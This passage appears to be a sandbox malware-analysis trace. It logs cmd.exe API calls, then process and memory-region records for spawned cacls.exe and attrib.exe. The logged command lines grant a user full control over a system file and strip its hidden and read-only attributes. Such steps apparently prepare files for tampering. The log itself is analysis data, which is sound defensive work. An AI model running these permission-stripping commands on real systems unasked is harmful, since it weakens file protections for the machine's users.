_String2="ERRORLEVEL") returned 6 [0147.999] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0147.999] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0147.999] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 
[0147.999] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0147.999] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0147.999] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0147.999] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf820 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0148.000] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf820, lpFilePart=0x1cf81c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf81c*="Desktop") returned 0x18 [0148.000] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0148.000] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf59c | out: lpFindFileData=0x1cf59c) returned 0x290b48 [0148.000] FindClose (in: hFindFile=0x290b48 | out: hFindFile=0x290b48) returned 1 [0148.000] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf59c | out: lpFindFileData=0x1cf59c) returned 0x290b48 [0148.000] FindClose (in: hFindFile=0x290b48 | out: hFindFile=0x290b48) returned 1 [0148.000] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf59c | out: lpFindFileData=0x1cf59c) returned 0x290b48 [0148.000] FindClose (in: hFindFile=0x290b48 | out: hFindFile=0x290b48) returned 1 [0148.000] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0148.000] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0148.001] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0148.001] GetEnvironmentStringsW () returned 0x290368* [0148.001] FreeEnvironmentStringsW (penv=0x290368) returned 1 [0148.001] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 
[0148.001] GetConsoleOutputCP () returned 0x1b5 [0148.038] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0148.038] GetUserDefaultLCID () returned 0x409 [0148.038] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0148.038] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf960, cchData=128 | out: lpLCData="0") returned 2 [0148.038] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf960, cchData=128 | out: lpLCData="0") returned 2 [0148.038] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf960, cchData=128 | out: lpLCData="1") returned 2 [0148.038] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0148.038] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0148.039] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0148.039] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0148.039] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0148.039] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0148.039] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0148.039] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0148.039] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0148.039] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0148.039] setlocale (category=0, locale=".OCP") returned="English_United States.437" 
[0148.040] GetConsoleTitleW (in: lpConsoleTitle=0x2809f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0148.040] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0148.040] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0148.040] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0148.040] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0148.041] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0148.042] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0148.042] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0148.042] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0148.042] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0148.042] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0148.042] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0148.042] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0148.048] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0148.048] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0148.048] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0148.048] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0148.049] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0148.049] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0148.049] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0148.053] SetErrorMode (uMode=0x0) returned 0x0 [0148.053] SetErrorMode (uMode=0x1) returned 0x0 [0148.053] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x292008, lpFilePart=0x1cf114 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf114*="Desktop") returned 0x18 [0148.053] SetErrorMode (uMode=0x0) returned 0x1 [0148.053] GetEnvironmentVariableW (in: lpName="PATH", 
lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0148.053] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0148.059] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0148.060] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1cee90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cee90) returned 0xffffffff [0148.060] GetLastError () returned 0x2 [0148.060] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x1cee90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cee90) returned 0xffffffff [0148.060] GetLastError () returned 0x2 [0148.060] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1cee90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cee90) returned 0x280f48 [0148.060] FindClose (in: hFindFile=0x280f48 | out: hFindFile=0x280f48) returned 1 [0148.061] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x1cee90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cee90) returned 0xffffffff [0148.061] GetLastError () returned 0x2 [0148.061] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x1cee90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cee90) returned 0x280f48 [0148.061] FindClose (in: hFindFile=0x280f48 | out: hFindFile=0x280f48) returned 1 [0148.061] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0148.061] _wcsicmp (_String1=".EXE", _String2=".CMD") 
returned 2 [0148.061] GetConsoleTitleW (in: lpConsoleTitle=0x1cf388, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0148.061] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cf210, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf2d8 | out: lpAttributeList=0x1cf210, lpSize=0x1cf2d8) returned 1 [0148.061] UpdateProcThreadAttribute (in: lpAttributeList=0x1cf210, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cf2d0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cf210, lpPreviousValue=0x0) returned 1 [0148.061] GetStartupInfoW (in: lpStartupInfo=0x1cf1cc | out: lpStartupInfo=0x1cf1cc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0148.061] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0148.062] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1cf26c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cf2b8 | out: lpCommandLine="CACLS \"C:\\Users\\All 
Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x1cf2b8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xb54, dwThreadId=0xba8)) returned 1 [0148.066] CloseHandle (hObject=0x4c) returned 1 [0148.066] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0148.066] GetEnvironmentStringsW () returned 0x2904d8* [0148.066] FreeEnvironmentStringsW (penv=0x2904d8) returned 1 [0148.066] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0148.365] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1cf1ac | out: lpExitCode=0x1cf1ac*=0x0) returned 1 [0148.365] CloseHandle (hObject=0x50) returned 1 [0148.365] _vsnwprintf (in: _Buffer=0x1cf2f4, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cf1b8 | out: _Buffer="00000000") returned 8 [0148.365] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0148.366] GetEnvironmentStringsW () returned 0x2922f0* [0148.366] FreeEnvironmentStringsW (penv=0x2922f0) returned 1 [0148.366] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0148.366] GetEnvironmentStringsW () returned 0x2922f0* [0148.366] FreeEnvironmentStringsW (penv=0x2922f0) returned 1 [0148.366] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cf210 | out: lpAttributeList=0x1cf210) [0148.366] GetConsoleTitleW (in: lpConsoleTitle=0x1cf5f4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0148.366] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0148.366] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0148.366] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0148.367] 
FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1cee90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cee90) returned 0xffffffff [0148.367] GetLastError () returned 0x2 [0148.367] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x1cee90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cee90) returned 0xffffffff [0148.367] GetLastError () returned 0x2 [0148.367] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1cee90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cee90) returned 0x280f48 [0148.367] FindClose (in: hFindFile=0x280f48 | out: hFindFile=0x280f48) returned 1 [0148.367] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x1cee90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cee90) returned 0xffffffff [0148.367] GetLastError () returned 0x2 [0148.368] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x1cee90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cee90) returned 0x280f48 [0148.368] FindClose (in: hFindFile=0x280f48 | out: hFindFile=0x280f48) returned 1 [0148.368] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0148.368] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0148.368] GetConsoleTitleW (in: lpConsoleTitle=0x1cf388, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0148.368] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cf210, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf2d8 | out: lpAttributeList=0x1cf210, lpSize=0x1cf2d8) returned 1 [0148.368] UpdateProcThreadAttribute (in: lpAttributeList=0x1cf210, dwFlags=0x0, Attribute=0x60001, 
lpValue=0x1cf2d0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cf210, lpPreviousValue=0x0) returned 1 [0148.368] GetStartupInfoW (in: lpStartupInfo=0x1cf1cc | out: lpStartupInfo=0x1cf1cc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0148.368] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0148.368] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1cf26c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cf2b8 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\"", lpProcessInformation=0x1cf2b8*(hProcess=0x4c, hThread=0x50, dwProcessId=0xacc, dwThreadId=0xa4c)) returned 1 [0148.370] CloseHandle (hObject=0x50) returned 1 [0148.370] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0148.370] GetEnvironmentStringsW () returned 0x292450* [0148.370] FreeEnvironmentStringsW (penv=0x292450) returned 1 [0148.370] 
WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0148.437] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x1cf1ac | out: lpExitCode=0x1cf1ac*=0x0) returned 1 [0148.437] CloseHandle (hObject=0x4c) returned 1 [0148.438] _vsnwprintf (in: _Buffer=0x1cf2f4, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cf1b8 | out: _Buffer="00000000") returned 8 [0148.438] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0148.438] GetEnvironmentStringsW () returned 0x292450* [0148.438] FreeEnvironmentStringsW (penv=0x292450) returned 1 [0148.438] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0148.438] GetEnvironmentStringsW () returned 0x292450* [0148.438] FreeEnvironmentStringsW (penv=0x292450) returned 1 [0148.438] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cf210 | out: lpAttributeList=0x1cf210) [0148.438] _get_osfhandle (_FileHandle=1) returned 0x7 [0148.438] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0148.438] _get_osfhandle (_FileHandle=1) returned 0x7 [0148.438] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0148.439] _get_osfhandle (_FileHandle=0) returned 0x3 [0148.439] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0148.439] SetConsoleInputExeNameW () returned 0x1 [0148.439] GetConsoleOutputCP () returned 0x1b5 [0148.439] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0148.439] SetThreadUILanguage (LangId=0x0) returned 0x409 [0148.439] exit (_Code=0) Process: id = "219" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea167e0" os_pid = "0xb54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "218" os_parent_pid = "0xa3c" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\Device 
Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18626 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18627 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18628 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18629 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 18630 start_va = 0x4f0000 end_va = 0x4f8fff entry_point = 0x4f0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 18631 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18632 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 18633 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: 
id = 18634 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 18635 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18636 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18637 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18638 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18639 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 18640 start_va = 0x3b0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 18641 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18642 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 18643 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18644 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" 
(normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 18645 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18646 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 18647 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 277 os_tid = 0xba8 Thread: id = 278 os_tid = 0xad4 Process: id = "220" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea167e0" os_pid = "0xacc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "218" os_parent_pid = "0xa3c" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18727 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18728 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18729 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed 
name = "pagefile_0x0000000000040000" filename = "" Region: id = 18730 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 18731 start_va = 0x5c0000 end_va = 0x5c6fff entry_point = 0x5c0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 18732 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18733 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 18734 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18735 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 18736 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18737 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18738 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18739 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18740 start_va = 0x120000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = 
